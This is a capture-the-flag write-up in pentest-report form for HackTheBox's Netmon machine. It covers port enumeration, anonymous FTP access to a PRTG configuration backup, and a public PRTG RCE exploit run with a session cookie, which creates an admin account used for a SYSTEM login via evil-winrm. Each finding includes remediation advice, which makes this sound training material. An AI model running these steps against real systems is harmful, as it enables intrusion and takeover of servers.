Netmon CTF Writeup

Netmon CTF Writeup

This is a writeup presented by Behind Security as part of the Road to OSCP series, focusing on the Netmon CTF from HackTheBox. The writeup takes the form of a pentest report.

Netmon CTF icon

Netmon CTF

Netmon is an easy difficulty Windows box with simple enumeration and exploitation. PRTG is running, and an FTP server with anonymous access allows reading of PRTG Network Monitor configuration files. The version of PRTG is vulnerable to RCE which can be exploited to gain a SYSTEM shell.

HackTheBox Logo

HackTheBox

Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.

Independent Challenge - 10.10.10.152

export IP=10.10.10.152

Service Enumeration

IP AddressPorts Open
10.10.10.152TCP: 21, 80, 135, 139, 445, 5985, 47001

Command: nmap -sC -sV -T4 -vv -p- 10.10.10.152

FTP Enumeration (port 21)

Unauthorized Access and Information Disclosure

Vulnerability Explanation: Behind Security noted the presence of a significant vulnerability in the FTP server running on 10.10.10.152. The FTP server configuration had anonymous login enabled, allowing unauthenticated access to the file system. Furthermore, the FTP server was configured to have the machine's root directory (C:) as the storage location, granting direct access to the entire file system. Exploring this vulnerability granted Behind Security the ability to read sensitive configuration files for PRTG Network Monitor hosted on port 80.

Vulnerability Fix:

  • Disable anonymous login on the FTP server to avoid unauthorized access;
  • Configure the FTP server to store the files on a separate directory, excluding everything else from the accessible area.

Severity: High

Steps to Reproduce the Finding: Log in via ftp as "anonymous": ftp [email protected] and specify no password (press enter when prompted).

Getting sensitive configuration file:

ftp> cd programdata
250 CWD command successful.
ftp> pwd
Remote directory: /programdata
ftp> ls 
229 Entering Extended Passive Mode (|||51713|)
150 Opening ASCII mode data connection.
12-15-21  10:40AM       <DIR>          Corefig
02-03-19  12:15AM       <DIR>          Licenses
11-20-16  10:36PM       <DIR>          Microsoft
02-03-19  12:18AM       <DIR>          Paessler
02-03-19  08:05AM       <DIR>          regid.1991-06.com.microsoft
07-16-16  09:18AM       <DIR>          SoftwareDistribution
02-03-19  12:15AM       <DIR>          TEMP
11-20-16  10:19PM       <DIR>          USOPrivate
11-20-16  10:19PM       <DIR>          USOShared
02-25-19  10:56PM       <DIR>          VMware
226 Transfer complete.
ftp> cd Paessler
250 CWD command successful.
ftp> ls 
229 Entering Extended Passive Mode (|||51716|)
150 Opening ASCII mode data connection.
08-10-23  03:15PM       <DIR>          PRTG Network Monitor
226 Transfer complete.
ftp> cd "PRTG Network Monitor"
250 CWD command successful.
ftp> dir 
229 Entering Extended Passive Mode (|||51717|)
150 Opening ASCII mode data connection.
08-10-23  01:51PM       <DIR>          Configuration Auto-Backups
08-10-23  01:10PM       <DIR>          Log Database
02-03-19  12:18AM       <DIR>          Logs (Debug)
02-03-19  12:18AM       <DIR>          Logs (Sensors)
02-03-19  12:18AM       <DIR>          Logs (System)
08-10-23  01:10PM       <DIR>          Logs (Web Server)
08-10-23  01:15PM       <DIR>          Monitoring Database
02-25-19  10:54PM              1189697 PRTG Configuration.dat
02-25-19  10:54PM              1189697 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak
08-10-23  03:15PM              1723410 PRTG Graph Data Cache.dat
02-25-19  11:00PM       <DIR>          Report PDFs
02-03-19  12:18AM       <DIR>          System Information Database
02-03-19  12:40AM       <DIR>          Ticket Database
02-03-19  12:18AM       <DIR>          ToDo Database
226 Transfer complete.
ftp> get "PRTG Configuration.old.bak"
local: PRTG Configuration.old.bak remote: PRTG Configuration.old.bak
229 Entering Extended Passive Mode (|||51726|)
150 Opening ASCII mode data connection.
100% |************************************************|  1126 KiB  879.01 KiB/s    00:00 ETA
226 Transfer complete.
1153755 bytes received in 00:01 (878.95 KiB/s)
ftp> exit
REDACTED prtgadmin password

Web Server Enumeration (port 80)

Initial Access - Outdated Software RCE

Vulnerability Explanation: The nmap scan returned us the exact version of PRTG network monitor - 18.1.37.13946. There is a known Remote Code Execution (RCE) vulnerability for this software version and a public exploit available. A successful exploitation of the vulnerability creates a new user on the target system with administrative privileges, posing a severe security risk.

Vulnerability Fix: Update PRTG network monitor to the latest version, as the vendor already issued a patch to this known vulnerability.

Severity: Extreme

Steps to Reproduce the Attack:

  1. Download the exploit here
  2. Use the previously found credentials (replace "2018" for "2019" as that password is from an old backup) to log in to the PRTG network monitor instance
  3. Copy the name and the value of the OCTOPUS session cookie
  4. Use the session cookie to execute the exploit: ./46527.sh -u http://10.10.10.152 -c "OCTOPUS1813713946=ezJENjZEOEIwLUEwODEtNDZBQi04NzQwLTY0QkVBNzM2RkQ1MH0%3D"
  5. Use evil-winrm tool with the credentials: pentest:P3nT3st!. The command used was: evil-winrm -u pentest -p 'P3nT3st!' -i 10.10.10.152
1. PRTG Network Monitor successful login as admin
2. Getting the session cookie
3. Using the cookie to execute the exploit
4. Using evil-winrm to log in as "pentester", with system privileges
Proof of Exploitation: REDACTED user.txt and root.txt

Conclusion

We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon! 

Behind Security main logo, cropped.

BEHIND SECURITY

Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.

Scroll to Top